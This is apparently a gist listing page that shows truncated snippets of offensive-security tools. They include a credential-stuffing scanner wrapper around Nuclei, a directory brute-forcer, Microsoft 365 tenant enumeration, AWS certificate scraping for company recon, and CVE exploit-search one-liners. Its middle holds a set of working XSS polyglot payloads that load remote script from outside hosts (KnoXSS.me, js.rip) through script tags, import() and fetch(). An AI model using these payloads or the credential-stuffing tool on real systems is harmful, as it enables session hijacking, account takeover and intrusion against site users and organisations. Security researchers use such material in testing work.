This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
declare -A companies | |
while read -r line; do | |
domain=$(echo "$line" | awk -F'[:[]' '{print $1}' | tr -d ' ') | |
company=$(echo "$line" | awk -F'[][]' '{print $2}' | tr -d ' ') | |
if [ -n "$domain" ] && [ -n "$company" ]; then | |
if [ -z "${companies[$company]}" ]; then |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl -s https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes[] | select(.region | startswith("us")) | .ip_prefix' | sort -u | tlsx -san -cn -silent -nc | awk -F'[][]' '{print $2}' | unfurl format %r.%t |tee aws_company.txt | |
sort ./aws_company.txt | uniq -c | sort -nr | awk '$1 >= 500' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import subprocess | |
import argparse | |
# Define the command to run Nuclei | |
nuclei_command = "nuclei -silent -t credential-stuffing/cloud -var username={} -var password={}" | |
# Create a command-line argument parser | |
parser = argparse.ArgumentParser(description='Credential Stuffing Scanner') | |
# Add an argument for specifying the creds.txt file |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Script/Src=//KnoXSS.me/00?1=1290></Script> | |
'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=/**/(import(/https:KnoXSS.me\00?1=1290/.source))//> | |
JavaScript://%250A0?1:import(/https:KnoXSS.me\00?1=1290/.source)//*'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(d=document,d.body.appendChild(d.createElement(/script/.source)).src=/https:\\KnoXSS.me\00?1=1290/.source)}//\76--> | |
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->"><img src=x onerror='fetch("https://js.rip/t9eoip8zws)'><script>$.getScript("//js.rip/t9eoip8zws")</script><script src="//js.rip/t9eoip8zws"></script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import os | |
def find_best_wordlists(user_word, max_wordlists): | |
wordlists_dir = '/opt/OneListForAll/dict' | |
wordlists = os.listdir(wordlists_dir) | |
matched_wordlists = [] | |
for wordlist in wordlists: | |
if user_word.lower() in wordlist.lower(): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
""" | |
Python script to enumerate valid Microsoft 365 domains, retrieve tenant name, and check for an MDI instance. | |
Based on: https://github.com/thalpius/Microsoft-Defender-for-Identity-Check-Instance. | |
Usage: ./check_mdi.py -d <domain> | |
""" | |
import argparse | |
import dns.resolver |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import asyncio | |
import aiohttp | |
import time | |
import sys | |
import argparse | |
import os | |
parser = argparse.ArgumentParser(description='Directory Bruteforce') | |
parser.add_argument('-u', '--url', help='URL to bruteforce', required=True) | |
parser.add_argument('-w', '--wordlist', help='Wordlist to use', required=True) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import feedparser | |
import webbrowser | |
feeds = ["https://blog.liftsecurity.io/feeds/all.atom.xml","https://winscripting.blog/feed/","https://shells.systems/feed/","http://r00tsec.blogspot.com/feeds/posts/default","https://nullsweep.com/rss/","http://rewtdance.blogspot.com/feeds/posts/default","https://www.youtube.com/playlist?list=UUOn5uwA42XWUnrjTilwG0xg","https://www.peew.pw/blog?format=RSS","http://syspanda.com/index.php/feed/","https://www.contextis.com/rss/blog","http://www.blackhillsinfosec.com/?feed=rss2","http://blog.ahmednabeel.com/rss/","https://cobbr.io/feed.xml","http://pen-testing.sans.org/blog/feed/","http://b4rtik.blogspot.com/feeds/posts/default","https://its-a-feature.github.io/feed.xml","https://chrislazari.com/feed/","https://pentesterslife.wordpress.com/feed/","https://labs.nettitude.com/feed/","https://stealthbits.com/blog/feed/","http://feeds.feedburner.com/CyberArms","https://wald0.com/?feed=rss2","http://www.thespanner.co.uk/feed/","http://www.wired.com/threatlevel/feed/","https://warroo |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import re | |
import csv | |
import time | |
import urllib.request | |
# Enter the URL you want to start from | |
url = input("Enter the starting URL: ") | |
# This is where we store the links we've already visited | |
visited = set() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Find Missing Scanner Plugins | |
curl https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json |jq -r '.vulnerabilities[].cveID' |while read cve; do echo "https://www.tenable.com/plugins/search?q=cves%3A%28%22$cve%22%29&sort=&page=1" |httpx -silent -match-string "No results found" ; done | |
Find Active Exploits | |
cat /tmp/cve.txt |cut -d "%" -f4 | cut -c 3- |while read cve; sleep 5s; do echo "https://github.com/trickest/cve/search?q=$cve" |httpx -silent -match-string "code result" ; done |